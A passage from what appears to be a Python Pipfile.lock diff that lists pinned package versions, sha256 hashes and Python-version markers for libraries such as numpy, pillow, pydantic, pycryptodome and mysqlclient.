"sha256:27a0f74a298769d9fdc8498fcb4f2beb86f0564bcdb1a37b58cbbe78e55cf8c0", + "sha256:28cea5a6392bb43d266782983b5a4216c25544cd7d80be681a155ddcdafd152d", + "sha256:448de661536d270ce04f2d7dddaa49b2fdba6e3bd8a83212164d4174ff43aa65", + "sha256:48525aec92b47baed9b3380371ab8ab6e63a5aab317347dfe9e55e02aaad22e8", + "sha256:5bc8d6bd3b274dd3846597855d96d38d947aedba18776aa998a8d46fabdaed76", + "sha256:5deb252fd42a77add936b463033a59b8e48eb2eaec2976d76b6878d031933fe4", + "sha256:5f546ac34093c6ce33f6278f7c88f0f147a4849386d3bf3ae193702f4fe31407", + "sha256:5fdd63e4f50e3538617887e9aee91855368d9fc1dea30da743837b0df7373bc4", + "sha256:65b122a993d9c81ea0bfde7689b3365318a88bde952e4dfa1b3a8b4ac05d168b", + "sha256:71a808334d3f41ef011faa5a5cd8153606df5fc0b56de5b2e89566c8093a0c9a", + "sha256:920169f0184215eef19294fa86ea49ffd4635dedfdea2b57e45cb4ee85d5ccaf", + "sha256:93a85495fb13dc484251b4c1fd7a5ac370cd0d812bbfc3b39c1bafefe95275d5", + "sha256:a2948c40a7dd46c1c33765718936669dc1f628f134013b02ff5ac6c7ef6942bf", + "sha256:c6c2ccb7af7154673c591189c3687b013122c5a891bb5651eca3db8e6c6c55bd", + "sha256:c96b8a0c019fe29040d520d9257d8c8f122a7343a8307bf8d6d4a43f5c5bfcc8", + "sha256:d42a98e76070a365a1d1c220fcac8aa4ada12ae0db679cb4d910fabefc88b994", + "sha256:dbeb24514c4acbc78d205f85dd0e800f34062efcc1f4a4857c57e4b4b8712bff", + "sha256:e60d0b09f62ae97a94605c3f73fd952395286cf3e3b9e7b97f60b01ddfbbda88", + "sha256:e64f48c6176e243ad015e995de05af7f22bbe370dbb5b32bd6988438ec873919", + "sha256:e831662208055b006eef68392a768ff83596035ffd6d846786578ba1714ba8f6", + "sha256:eda5c8b9949ed411ff752b9a01adda31afe7eae1e53e946dbdf9db23865e66c4" + ], + "index": "pypi", + "markers": "python_version >= '3.7'", + "version": "==1.0.1" + }, + "mypy-extensions": { + "hashes": [ + "sha256:4392f6c0eb8a5668a69e23d168ffa70f0be9ccfd32b5cc2d26a34ae5b844552d", + "sha256:75dbf8955dc00442a438fc4d0666508a9a97b6bd41aa2f0ffe9d2f2725af0782" + ], + "markers": "python_version >= '3.5'", + "version": "==1.0.0" + }, + "mysqlclient": { + "hashes": [ + "sha256:004fe1d30d2c2ff8072f8ea513bcec235fd9b896f70dad369461d0ad7e570e98", + "sha256:04368445f9c487d8abb7a878e3d23e923e6072c04a6c320f9e0dc8a82efba14e", + "sha256:530ece9995a36cadb6211b9787f0c9e05cdab6702549bdb4236af5e9b535ed6a", + "sha256:5670679ff1be1cc3fef0fa81bf39f0cd70605ba121141050f02743eb878ac114", + "sha256:68837b6bb23170acffb43ae411e47533a560b6360c06dac39aa55700972c93b2", + "sha256:955dba905a7443ce4788c63fdb9f8d688316260cf60b20ff51ac3b1c77616ede", + "sha256:9c6b142836c7dba4f723bf9c93cc46b6e5081d65b2af807f400dda9eb85a16d0" + ], + "index": "pypi", + "markers": "python_version >= '3.8'", + "version": "==2.2.0" + }, + "networkit": { + "hashes": [ + "sha256:0ff615156110510c3c44d538baf6f48caf06af0e0b9fe4e4e3a1c527d54598b7", + "sha256:1b223201f63d0f282af75ff44710d476b414c6229ad767b6ca9242c9d25f0abb", + "sha256:29a31a1ad709f802d113907ee47f481dee713b0a72ebe44fb0930e3a92be6536", + "sha256:34e42a1a6836149265478bb0a70e75382487188e29632811ee894e231fe25788", + "sha256:36caba5c75bec9dab52a2fc98b6f24ebf89ad061256051645d73c71d88c1fd92", + "sha256:45863a9a1d554266112cfda895c5bfc0b9c74a80ffbb1b4bfb9fbf5d03533bd6", + "sha256:5b56564385fd4b749f34a2745c06b06378e124c46082342bbe9dbf1a73c9d76e", + "sha256:67b71732595ee1f192d1ffa93420087ce0fef63bd59cf0c3484e30847c997044", + "sha256:842781097d8d6ee9db2d847d9d7de958e36cf3d4c20bf84db7ae63cae12d7479", + "sha256:85071cd39692e93b3882dfae642a71421d4f74bc40ecede3877272c945e4bbee", + "sha256:9282d27edef5d9376b3016c047829d696ced67566b76f79679940687f27aaaab", + "sha256:98acc4c94b19353ccb074e689dea91272e877c4fd6b60c69ee8869433f14a76c", + "sha256:ae4e85900c2eb682ebef31b6bed3c645946394c4490318d10a3c01ed12d46bdc", + "sha256:b0cd7134c37aaf0c4c1ab489a0bdd8cb53d369c37a2b8469c6ce8be0f270faa4", + "sha256:bbb523c1e00aa90e35fd29585c55ee2a2c58016e2764e2249b8ae218e0678fae", + "sha256:bd0b62b1fcd656a8d33ab677aea4e14af1a8b53b235a2316c88f7ee79e6da784" + ], + "index": "pypi", + "version": "==10.1" + }, + "numpy": { + "hashes": [ + "sha256:0d60fbae8e0019865fc4784745814cff1c421df5afee233db6d88ab4f14655a2", + "sha256:1a1329e26f46230bf77b02cc19e900db9b52f398d6722ca853349a782d4cff55", + "sha256:1b9735c27cea5d995496f46a8b1cd7b408b3f34b6d50459d9ac8fe3a20cc17bf", + "sha256:2792d23d62ec51e50ce4d4b7d73de8f67a2fd3ea710dcbc8563a51a03fb07b01", + "sha256:3e0746410e73384e70d286f93abf2520035250aad8c5714240b0492a7302fdca", + "sha256:4c3abc71e8b6edba80a01a52e66d83c5d14433cbcd26a40c329ec7ed09f37901", + "sha256:5883c06bb92f2e6c8181df7b39971a5fb436288db58b5a1c3967702d4278691d", + "sha256:5c97325a0ba6f9d041feb9390924614b60b99209a71a69c876f71052521d42a4", + "sha256:60e7f0f7f6d0eee8364b9a6304c2845b9c491ac706048c7e8cf47b83123b8dbf", + "sha256:76b4115d42a7dfc5d485d358728cdd8719be33cc5ec6ec08632a5d6fca2ed380", + "sha256:7dc869c0c75988e1c693d0e2d5b26034644399dd929bc049db55395b1379e044", + "sha256:834b386f2b8210dca38c71a6e0f4fd6922f7d3fcff935dbe3a570945acb1b545", + "sha256:8b77775f4b7df768967a7c8b3567e309f617dd5e99aeb886fa14dc1a0791141f", + "sha256:90319e4f002795ccfc9050110bbbaa16c944b1c37c0baeea43c5fb881693ae1f", + "sha256:b79e513d7aac42ae918db3ad1341a015488530d0bb2a6abcbdd10a3a829ccfd3", + "sha256:bb33d5a1cf360304754913a350edda36d5b8c5331a8237268c48f91253c3a364", + "sha256:bec1e7213c7cb00d67093247f8c4db156fd03075f49876957dca4711306d39c9", + "sha256:c5462d19336db4560041517dbb7759c21d181a67cb01b36ca109b2ae37d32418", + "sha256:c5652ea24d33585ea39eb6a6a15dac87a1206a692719ff45d53c5282e66d4a8f", + "sha256:d7806500e4f5bdd04095e849265e55de20d8cc4b661b038957354327f6d9b295", + "sha256:db3ccc4e37a6873045580d413fe79b68e47a681af8db2e046f1dacfa11f86eb3", + "sha256:dfe4a913e29b418d096e696ddd422d8a5d13ffba4ea91f9f60440a3b759b0187", + "sha256:eb942bfb6f84df5ce05dbf4b46673ffed0d3da59f13635ea9b926af3deb76926", + "sha256:f08f2e037bba04e707eebf4bc934f1972a315c883a9e0ebfa8a7756eabf9e357", + "sha256:fd608e19c8d7c55021dffd43bfe5492fab8cc105cc8986f813f8c3c048b38760" + ], + "markers": "python_version >= '3.9'", + "version": "==1.25.2" + }, + "odfpy": { + "hashes": [ + "sha256:db766a6e59c5103212f3cc92ec8dd50a0f3a02790233ed0b52148b70d3c438ec", + "sha256:fc3b8d1bc098eba4a0fda865a76d9d1e577c4ceec771426bcb169a82c5e9dfe0" + ], + "version": "==1.4.1" + }, + "openpyxl": { + "hashes": [ + "sha256:40f568b9829bf9e446acfffce30250ac1fa39035124d55fc024025c41481c90f", + "sha256:8f3b11bd896a95468a4ab162fc4fcd260d46157155d1f8bfaabb99d88cfcf79f" + ], + "index": "pypi", + "markers": "python_version >= '3.6'", + "version": "==3.0.9" + }, + "oss2": { + "hashes": [ + "sha256:8548ea7d43326f6fd679bc8b79b3a2dfbfe9c6a60ed57e2410818fec57023dda" + ], + "index": "pypi", + "version": "==2.13.1" + }, + "packaging": { + "hashes": [ + "sha256:dd47c42927d89ab911e606518907cc2d3a1f38bbd026385970643f9c5b8ecfeb", + "sha256:ef103e05f519cdc783ae24ea4e2e0f508a9c99b2d4969652eed6a2e1ea5bd522" + ], + "index": "pypi", + "markers": "python_version >= '3.6'", + "version": "==21.3" + }, + "pep8": { + "hashes": [ + "sha256:b22cfae5db09833bb9bd7c8463b53e1a9c9b39f12e304a8d0bba729c501827ee", + "sha256:fe249b52e20498e59e0b5c5256aa52ee99fc295b26ec9eaa85776ffdb9fe6374" + ], + "index": "pypi", + "version": "==1.7.1" + }, + "pillow": { + "hashes": [ + "sha256:03150abd92771742d4a8cd6f2fa6246d847dcd2e332a18d0c15cc75bf6703040", + "sha256:073adb2ae23431d3b9bcbcff3fe698b62ed47211d0716b067385538a1b0f28b8", + "sha256:0b07fffc13f474264c336298d1b4ce01d9c5a011415b79d4ee5527bb69ae6f65", + "sha256:0b7257127d646ff8676ec8a15520013a698d1fdc48bc2a79ba4e53df792526f2", + "sha256:12ce4932caf2ddf3e41d17fc9c02d67126935a44b86df6a206cf0d7161548627", + "sha256:15c42fb9dea42465dfd902fb0ecf584b8848ceb28b41ee2b58f866411be33f07", + "sha256:18498994b29e1cf86d505edcb7edbe814d133d2232d256db8c7a8ceb34d18cef", + "sha256:1c7c8ae3864846fc95f4611c78129301e203aaa2af813b703c55d10cc1628535", + "sha256:22b012ea2d065fd163ca096f4e37e47cd8b59cf4b0fd47bfca6abb93df70b34c", + "sha256:276a5ca930c913f714e372b2591a22c4bd3b81a418c0f6635ba832daec1cbcfc", + "sha256:2e0918e03aa0c72ea56edbb00d4d664294815aa11291a11504a377ea018330d3", + "sha256:3033fbe1feb1b59394615a1cafaee85e49d01b51d54de0cbf6aa8e64182518a1", + "sha256:3168434d303babf495d4ba58fc22d6604f6e2afb97adc6a423e917dab828939c", + "sha256:32a44128c4bdca7f31de5be641187367fe2a450ad83b833ef78910397db491aa", + "sha256:3dd6caf940756101205dffc5367babf288a30043d35f80936f9bfb37f8355b32", + "sha256:40e1ce476a7804b0fb74bcfa80b0a2206ea6a882938eaba917f7a0f004b42502", + "sha256:41e0051336807468be450d52b8edd12ac60bebaa97fe10c8b660f116e50b30e4", + "sha256:4390e9ce199fc1951fcfa65795f239a8a4944117b5935a9317fb320e7767b40f", + "sha256:502526a2cbfa431d9fc2a079bdd9061a2397b842bb6bc4239bb176da00993812", + "sha256:51e0e543a33ed92db9f5ef69a0356e0b1a7a6b6a71b80df99f1d181ae5875636", + "sha256:57751894f6618fd4308ed8e0c36c333e2f5469744c34729a27532b3db106ee20", + "sha256:5d77adcd56a42d00cc1be30843d3426aa4e660cab4a61021dc84467123f7a00c", + "sha256:655a83b0058ba47c7c52e4e2df5ecf484c1b0b0349805896dd350cbc416bdd91", + "sha256:68943d632f1f9e3dce98908e873b3a090f6cba1cbb1b892a9e8d97c938871fbe", + "sha256:6c738585d7a9961d8c2821a1eb3dcb978d14e238be3d70f0a706f7fa9316946b", + "sha256:73bd195e43f3fadecfc50c682f5055ec32ee2c933243cafbfdec69ab1aa87cad", + "sha256:772a91fc0e03eaf922c63badeca75e91baa80fe2f5f87bdaed4280662aad25c9", + "sha256:77ec3e7be99629898c9a6d24a09de089fa5356ee408cdffffe62d67bb75fdd72", + "sha256:7db8b751ad307d7cf238f02101e8e36a128a6cb199326e867d1398067381bff4", + "sha256:801ec82e4188e935c7f5e22e006d01611d6b41661bba9fe45b60e7ac1a8f84de", + "sha256:82409ffe29d70fd733ff3c1025a602abb3e67405d41b9403b00b01debc4c9a29", + "sha256:828989c45c245518065a110434246c44a56a8b2b2f6347d1409c787e6e4651ee", + "sha256:829f97c8e258593b9daa80638aee3789b7df9da5cf1336035016d76f03b8860c", + "sha256:871b72c3643e516db4ecf20efe735deb27fe30ca17800e661d769faab45a18d7", + "sha256:89dca0ce00a2b49024df6325925555d406b14aa3efc2f752dbb5940c52c56b11", + "sha256:90fb88843d3902fe7c9586d439d1e8c05258f41da473952aa8b328d8b907498c", + "sha256:97aabc5c50312afa5e0a2b07c17d4ac5e865b250986f8afe2b02d772567a380c", + "sha256:9aaa107275d8527e9d6e7670b64aabaaa36e5b6bd71a1015ddd21da0d4e06448", + "sha256:9f47eabcd2ded7698106b05c2c338672d16a6f2a485e74481f524e2a23c2794b", + "sha256:a0a06a052c5f37b4ed81c613a455a81f9a3a69429b4fd7bb913c3fa98abefc20", + "sha256:ab388aaa3f6ce52ac1cb8e122c4bd46657c15905904b3120a6248b5b8b0bc228", + "sha256:ad58d27a5b0262c0c19b47d54c5802db9b34d38bbf886665b626aff83c74bacd", + "sha256:ae5331c23ce118c53b172fa64a4c037eb83c9165aba3a7ba9ddd3ec9fa64a699", + "sha256:af0372acb5d3598f36ec0914deed2a63f6bcdb7b606da04dc19a88d31bf0c05b", + "sha256:afa4107d1b306cdf8953edde0534562607fe8811b6c4d9a486298ad31de733b2", + "sha256:b03ae6f1a1878233ac620c98f3459f79fd77c7e3c2b20d460284e1fb370557d4", + "sha256:b0915e734b33a474d76c28e07292f196cdf2a590a0d25bcc06e64e545f2d146c", + "sha256:b4012d06c846dc2b80651b120e2cdd787b013deb39c09f407727ba90015c684f", + "sha256:b472b5ea442148d1c3e2209f20f1e0bb0eb556538690fa70b5e1f79fa0ba8dc2", + "sha256:b59430236b8e58840a0dfb4099a0e8717ffb779c952426a69ae435ca1f57210c", + "sha256:b90f7616ea170e92820775ed47e136208e04c967271c9ef615b6fbd08d9af0e3", + "sha256:b9a65733d103311331875c1dca05cb4606997fd33d6acfed695b1232ba1df193", + "sha256:bac18ab8d2d1e6b4ce25e3424f709aceef668347db8637c2296bcf41acb7cf48", + "sha256:bca31dd6014cb8b0b2db1e46081b0ca7d936f856da3b39744aef499db5d84d02", + "sha256:be55f8457cd1eac957af0c3f5ece7bc3f033f89b114ef30f710882717670b2a8", + "sha256:c7025dce65566eb6e89f56c9509d4f628fddcedb131d9465cacd3d8bac337e7e", + "sha256:c935a22a557a560108d780f9a0fc426dd7459940dc54faa49d83249c8d3e760f", + "sha256:dbb8e7f2abee51cef77673be97760abff1674ed32847ce04b4af90f610144c7b", + "sha256:e6ea6b856a74d560d9326c0f5895ef8050126acfdc7ca08ad703eb0081e82b74", + "sha256:ebf2029c1f464c59b8bdbe5143c79fa2045a581ac53679733d3a91d400ff9efb", + "sha256:f1ff2ee69f10f13a9596480335f406dd1f70c3650349e2be67ca3139280cade0" + ], + "index": "pypi", + "markers": "python_version >= '3.7'", + "version": "==9.3.0" + }, + "prometheus-client": { + "hashes": [ + "sha256:21e674f39831ae3f8acde238afd9a27a37d0d2fb5a28ea094f0ce25d2cbf2091", + "sha256:e537f37160f6807b8202a6fc4764cdd19bac5480ddd3e0d463c3002b34462101" + ], + "markers": "python_version >= '3.6'", + "version": "==0.17.1" + }, + "prompt-toolkit": { + "hashes": [ + "sha256:04505ade687dc26dc4284b1ad19a83be2f2afe83e7a828ace0c72f3a1df72aac", + "sha256:9dffbe1d8acf91e3de75f3b544e4842382fc06c6babe903ac9acb74dc6e08d88" + ], + "markers": "python_full_version >= '3.7.0'", + "version": "==3.0.39" + }, + "pycodestyle": { + "hashes": [ + "sha256:259bcc17857d8a8b3b4a2327324b79e5f020a13c16074670f9c8c8f872ea76d0", + "sha256:5d1013ba8dc7895b548be5afb05740ca82454fd899971563d2ef625d090326f8" + ], + "markers": "python_version >= '3.8'", + "version": "==2.11.0" + }, + "pycparser": { + "hashes": [ + "sha256:8ee45429555515e1f6b185e78100aea234072576aa43ab53aefcae078162fca9", + "sha256:e644fdec12f7872f86c58ff790da456218b10f863970249516d60a5eaca77206" + ], + "version": "==2.21" + }, + "pycryptodome": { + "hashes": [ + "sha256:01489bbdf709d993f3058e2996f8f40fee3f0ea4d995002e5968965fa2fe89fb", + "sha256:10da29526a2a927c7d64b8f34592f461d92ae55fc97981aab5bbcde8cb465bb6", + "sha256:12600268763e6fec3cefe4c2dcdf79bde08d0b6dc1813887e789e495cb9f3403", + "sha256:157c9b5ba5e21b375f052ca78152dd309a09ed04703fd3721dce3ff8ecced148", + "sha256:16bfd98dbe472c263ed2821284118d899c76968db1a6665ade0c46805e6b29a4", + "sha256:363dd6f21f848301c2dcdeb3c8ae5f0dee2286a5e952a0f04954b82076f23825", + "sha256:3811e31e1ac3069988f7a1c9ee7331b942e605dfc0f27330a9ea5997e965efb2", + "sha256:422c89fd8df8a3bee09fb8d52aaa1e996120eafa565437392b781abec2a56e14", + "sha256:4604816adebd4faf8810782f137f8426bf45fee97d8427fa8e1e49ea78a52e2c", + "sha256:4944defabe2ace4803f99543445c27dd1edbe86d7d4edb87b256476a91e9ffa4", + "sha256:51eae079ddb9c5f10376b4131be9589a6554f6fd84f7f655180937f611cd99a2", + "sha256:53aee6be8b9b6da25ccd9028caf17dcdce3604f2c7862f5167777b707fbfb6cb", + "sha256:62a1e8847fabb5213ccde38915563140a5b338f0d0a0d363f996b51e4a6165cf", + "sha256:6f4b967bb11baea9128ec88c3d02f55a3e338361f5e4934f5240afcb667fdaec", + "sha256:78d863476e6bad2a592645072cc489bb90320972115d8995bcfbee2f8b209918", + "sha256:795bd1e4258a2c689c0b1f13ce9684fa0dd4c0e08680dcf597cf9516ed6bc0f3", + "sha256:7a3d22c8ee63de22336679e021c7f2386f7fc465477d59675caa0e5706387944", + "sha256:83c75952dcf4a4cebaa850fa257d7a860644c70a7cd54262c237c9f2be26f76e", + "sha256:928078c530da78ff08e10eb6cada6e0dff386bf3d9fa9871b4bbc9fbc1efe024", + "sha256:957b221d062d5752716923d14e0926f47670e95fead9d240fa4d4862214b9b2f", + "sha256:9ad6f09f670c466aac94a40798e0e8d1ef2aa04589c29faa5b9b97566611d1d1", + "sha256:9c8eda4f260072f7dbe42f473906c659dcbadd5ae6159dfb49af4da1293ae380", + "sha256:b1d9701d10303eec8d0bd33fa54d44e67b8be74ab449052a8372f12a66f93fb9", + "sha256:b6a610f8bfe67eab980d6236fdc73bfcdae23c9ed5548192bb2d530e8a92780e", + "sha256:c9adee653fc882d98956e33ca2c1fb582e23a8af7ac82fee75bd6113c55a0413", + "sha256:cb1be4d5af7f355e7d41d36d8eec156ef1382a88638e8032215c215b82a4b8ec", + "sha256:d1497a8cd4728db0e0da3c304856cb37c0c4e3d0b36fcbabcc1600f18504fc54", + "sha256:d20082bdac9218649f6abe0b885927be25a917e29ae0502eaf2b53f1233ce0c2", + "sha256:e8ad74044e5f5d2456c11ed4cfd3e34b8d4898c0cb201c4038fe41458a82ea27", + "sha256:f022a4fd2a5263a5c483a2bb165f9cb27f2be06f2f477113783efe3fe2ad887b", + "sha256:f21efb8438971aa16924790e1c3dba3a33164eb4000106a55baaed522c261acf", + "sha256:fc0a73f4db1e31d4a6d71b672a48f3af458f548059aa05e83022d5f61aac9c08" + ], + "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4'", + "version": "==3.18.0" + }, + "pycryptodomex": { + "hashes": [ + "sha256:1ca8e1b4c62038bb2da55451385246f51f412c5f5eabd64812c01766a5989b4a", + "sha256:298c00ea41a81a491d5b244d295d18369e5aac4b61b77b2de5b249ca61cd6659", + "sha256:2aa887683eee493e015545bd69d3d21ac8d5ad582674ec98f4af84511e353e45", + "sha256:2ce76ed0081fd6ac8c74edc75b9d14eca2064173af79843c24fa62573263c1f2", + "sha256:3da13c2535b7aea94cc2a6d1b1b37746814c74b6e80790daddd55ca5c120a489", + "sha256:406ec8cfe0c098fadb18d597dc2ee6de4428d640c0ccafa453f3d9b2e58d29e2", + "sha256:4d0db8df9ffae36f416897ad184608d9d7a8c2b46c4612c6bc759b26c073f750", + "sha256:530756d2faa40af4c1f74123e1d889bd07feae45bac2fd32f259a35f7aa74151", + "sha256:77931df40bb5ce5e13f4de2bfc982b2ddc0198971fbd947776c8bb5050896eb2", + "sha256:797a36bd1f69df9e2798e33edb4bd04e5a30478efc08f9428c087f17f65a7045", + "sha256:8085bd0ad2034352eee4d4f3e2da985c2749cb7344b939f4d95ead38c2520859", + "sha256:8536bc08d130cae6dcba1ea689f2913dfd332d06113904d171f2f56da6228e89", + "sha256:a4d412eba5679ede84b41dbe48b1bed8f33131ab9db06c238a235334733acc5e", + "sha256:aebecde2adc4a6847094d3bd6a8a9538ef3438a5ea84ac1983fcb167db614461", + "sha256:b276cc4deb4a80f9dfd47a41ebb464b1fe91efd8b1b8620cf5ccf8b824b850d6", + "sha256:b5a185ae79f899b01ca49f365bdf15a45d78d9856f09b0de1a41b92afce1a07f", + "sha256:c4d8977ccda886d88dc3ca789de2f1adc714df912ff3934b3d0a3f3d777deafb", + "sha256:c5dd3ffa663c982d7f1be9eb494a8924f6d40e2e2f7d1d27384cfab1b2ac0662", + "sha256:ca88f2f7020002638276439a01ffbb0355634907d1aa5ca91f3dc0c2e44e8f3b", + "sha256:d2cce1c82a7845d7e2e8a0956c6b7ed3f1661c9acf18eb120fc71e098ab5c6fe", + "sha256:d709572d64825d8d59ea112e11cc7faf6007f294e9951324b7574af4251e4de8", + "sha256:da8db8374295fb532b4b0c467e66800ef17d100e4d5faa2bbbd6df35502da125", + "sha256:e36c7e3b5382cd5669cf199c4a04a0279a43b2a3bdd77627e9b89778ac9ec08c", + "sha256:e95a4a6c54d27a84a4624d2af8bb9ee178111604653194ca6880c98dcad92f48", + "sha256:ee835def05622e0c8b1435a906491760a43d0c462f065ec9143ec4b8d79f8bff", + "sha256:f75009715dcf4a3d680c2338ab19dac5498f8121173a929872950f4fb3a48fbf", + "sha256:f8524b8bc89470cec7ac51734907818d3620fb1637f8f8b542d650ebec42a126" + ], + "index": "pypi", + "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4'", + "version": "==3.14.1" + }, + "pydantic": { + "hashes": [ + "sha256:0fe8a415cea8f340e7a9af9c54fc71a649b43e8ca3cc732986116b3cb135d303", + "sha256:1289c180abd4bd4555bb927c42ee42abc3aee02b0fb2d1223fb7c6e5bef87dbe", + "sha256:1eb2085c13bce1612da8537b2d90f549c8cbb05c67e8f22854e201bde5d98a47", + "sha256:2031de0967c279df0d8a1c72b4ffc411ecd06bac607a212892757db7462fc494", + "sha256:2a7bac939fa326db1ab741c9d7f44c565a1d1e80908b3797f7f81a4f86bc8d33", + "sha256:2d5a58feb9a39f481eda4d5ca220aa8b9d4f21a41274760b9bc66bfd72595b86", + "sha256:2f9a6fab5f82ada41d56b0602606a5506aab165ca54e52bc4545028382ef1c5d", + "sha256:2fcfb5296d7877af406ba1547dfde9943b1256d8928732267e2653c26938cd9c", + "sha256:549a8e3d81df0a85226963611950b12d2d334f214436a19537b2efed61b7639a", + "sha256:598da88dfa127b666852bef6d0d796573a8cf5009ffd62104094a4fe39599565", + "sha256:5d1197e462e0364906cbc19681605cb7c036f2475c899b6f296104ad42b9f5fb", + "sha256:69328e15cfda2c392da4e713443c7dbffa1505bc9d566e71e55abe14c97ddc62", + "sha256:6a9dfa722316f4acf4460afdf5d41d5246a80e249c7ff475c43a3a1e9d75cf62", + "sha256:6b30bcb8cbfccfcf02acb8f1a261143fab622831d9c0989707e0e659f77a18e0", + "sha256:6c076be61cd0177a8433c0adcb03475baf4ee91edf5a4e550161ad57fc90f523", + "sha256:771735dc43cf8383959dc9b90aa281f0b6092321ca98677c5fb6125a6f56d58d", + "sha256:795e34e6cc065f8f498c89b894a3c6da294a936ee71e644e4bd44de048af1405", + "sha256:87afda5539d5140cb8ba9e8b8c8865cb5b1463924d38490d73d3ccfd80896b3f", + "sha256:8fb2aa3ab3728d950bcc885a2e9eff6c8fc40bc0b7bb434e555c215491bcf48b", + "sha256:a1fcb59f2f355ec350073af41d927bf83a63b50e640f4dbaa01053a28b7a7718", + "sha256:a5e7add47a5b5a40c49b3036d464e3c7802f8ae0d1e66035ea16aa5b7a3923ed", + "sha256:a73f489aebd0c2121ed974054cb2759af8a9f747de120acd2c3394cf84176ccb", + "sha256:ab26038b8375581dc832a63c948f261ae0aa21f1d34c1293469f135fa92972a5", + "sha256:b0d191db0f92dfcb1dec210ca244fdae5cbe918c6050b342d619c09d31eea0cc", + "sha256:b749a43aa51e32839c9d71dc67eb1e4221bb04af1033a32e3923d46f9effa942", + "sha256:b7ccf02d7eb340b216ec33e53a3a629856afe1c6e0ef91d84a4e6f2fb2ca70fe", + "sha256:ba5b2e6fe6ca2b7e013398bc7d7b170e21cce322d266ffcd57cca313e54fb246", + "sha256:ba5c4a8552bff16c61882db58544116d021d0b31ee7c66958d14cf386a5b5350", + "sha256:c79e6a11a07da7374f46970410b41d5e266f7f38f6a17a9c4823db80dadf4303", + "sha256:ca48477862372ac3770969b9d75f1bf66131d386dba79506c46d75e6b48c1e09", + "sha256:dea7adcc33d5d105896401a1f37d56b47d443a2b2605ff8a969a0ed5543f7e33", + "sha256:e0a16d274b588767602b7646fa05af2782576a6cf1022f4ba74cbb4db66f6ca8", + "sha256:e4129b528c6baa99a429f97ce733fff478ec955513630e61b49804b6cf9b224a", + "sha256:e5f805d2d5d0a41633651a73fa4ecdd0b3d7a49de4ec3fadf062fe16501ddbf1", + "sha256:ef6c96b2baa2100ec91a4b428f80d8f28a3c9e53568219b6c298c1125572ebc6", + "sha256:fdbdd1d630195689f325c9ef1a12900524dceb503b00a987663ff4f58669b93d" + ], + "markers": "python_version >= '3.7'", + "version": "==1.10.12" + }, + "pymysql": { + "hashes": [ + "sha256:41fc3a0c5013d5f039639442321185532e3e2c8924687abe6537de157d403641", + "sha256:816927a350f38d56072aeca5dfb10221fe1dc653745853d30a216637f5d7ad36" + ], + "index": "pypi", + "markers": "python_version >= '3.6'", + "version": "==1.0.2" + }, + "pyparsing": { + "hashes": [ + "sha256:32c7c0b711493c72ff18a981d24f28aaf9c1fb7ed5e9667c9e84e3db623bdbfb", + "sha256:ede28a1a32462f5a9705e07aea48001a08f7cf81a021585011deba701581a0db" + ], + "markers": "python_full_version >= '3.6.8'", + "version": "==3.1.1" + }, + "pyre2": { + "hashes": [ + "sha256:18cd5d76973ee57232a5d851489c202105e4752aee6dcbd38742c0475f3f1c4e", + "sha256:1efec117f2543b38adcbe038a2ae156eb91b6ed8a73c998c3752a766d6241075", + "sha256:225784d7bd905bc3e87d4bbcc6ac4087ccea8905dd657273fd71bfb113e50e82", + "sha256:310d5c98495114692940ffa020aaeef1341427755b6ca5a17c63092060ed93dc", + "sha256:608558276d3539002ad6300d0b0a2b0941577fdea009715ff4d31052e05cb409", + "sha256:617c4d75b41b34afe7590e144efad1c564a8b49a1e0827872afc2243b24beada", + "sha256:6d8e550899886ee01f1b8149ba1c336e1c749cec2e33414815a76fb5649cdf67", + "sha256:6fe972c0cadec49a5a055690e5aa29f8aebaed0fa9b7d8d3530e33719b61f91c", + "sha256:7c398942c3467fe23b2dd4a11dd78da8aee774d0b481e84b1b208819ee724cca", + "sha256:961020835a3b805eed51a082e5effdccb51979c4efef2a17f17122967cb4749a", + "sha256:97de5d4cf7d8b9be7dbe0dc0941c4a6c1395fc598722d9644adc55427d3dd083", + "sha256:b87e9aeee74376210bd82c8328eb007b93378f3cd61fa6176161c3b9037e8474", + "sha256:c3b45f789374d0f95866330fcd34bb6b93705e8f5c276d9d70d318a227ba5954", + "sha256:cc180989186f05b75020b53c79059c338e9e1940d325fc945c84aab2b5c57525", + "sha256:ebe92a3222f2f6f176eeb3859638734e4f9a82d5940ad7d6f0c1288153c70ce2", + "sha256:f3467dd9a4c8100f6406bc6277d945a13b7fd7c4426d2415564de1324b5db94f", + "sha256:f3ae7b087abcbc4b910d535c2fb877ef452b61d2514a63fd15b8b020b51fe4b5" + ], + "index": "pypi", + "markers": "python_version >= '3.6'", + "version": "==0.3.6" + }, + "pyrsistent": { + "hashes": [ + "sha256:06579d46d8ad69529b28f88711191a7fe7103c92d04a9f338dc754f71b92efa0", + "sha256:1d0620474d509172e1c50b79d5626bfe1899f174bf650186a50c6ce31289ff52", + "sha256:2032d971711643049b4f2c3ca5155a855d507d73bad26dac8d4349e5c5dd6758", + "sha256:2c641111c3f110379bb9001dbb26b34eb8cafab3d0fa855dc161c391461a4aab", + "sha256:327f99800d04a9abcf580daecfd6dd4bfdb4a7e61c71bf2cd1189ef1ca44bade", + "sha256:39f15ad754384e744ac8b00805913bfa66c41131faaa3e4c45c4af0731f3e8f6", + "sha256:4c58bd93c4d502f52938fccdbe6c9d70df3a585c6b39d900fab5f76b604282aa", + "sha256:62a41037387ae849a493cd945e22b34d167a843d57f75b07dbfad6d96cef485c", + "sha256:62b704f18526a8fc243152de8f3f40ae39c5172baff10f50c0c5d5331d6f2342", + "sha256:6df99c3578dc4eb33f3eb26bc28277ab40a720b71649d940bff9c1f704377772", + "sha256:6ef7430e45c5fa0bb6c361cada4a08ed9c184b5ed086815a85c3bc8c5054566b", + "sha256:73b2db09fe15b6e444c0bd566a125a385ca6493456224ce8b367d734f079f576", + "sha256:73d4ec2997716af3c8f28f7e3d3a565d273a598982d2fe95639e07ce4db5da45", + "sha256:73e3e2fd9da009d558050697cc22ad689f89a14a2ef2e67304628a913e59c947", + "sha256:890f577aec554f142e01daf890221d10e4f93a9b1107998d631d3f075b55e8f8", + "sha256:8a34a2a8b220247658f7ced871197c390b3a6371d796a5869ab1c62abe0be527", + "sha256:8bc23e9ddcb523c3ffb4d712aa0bd5bc67b34ff4e2b23fb557012171bdb4013a", + "sha256:945297fc344fef4d540135180ce7babeb2291d124698cc6282f3eac624aa5e82", + "sha256:aaa869d9199d7d4c70a57678aff21654cc179c0c32bcfde87f1d65d0ff47e520", + 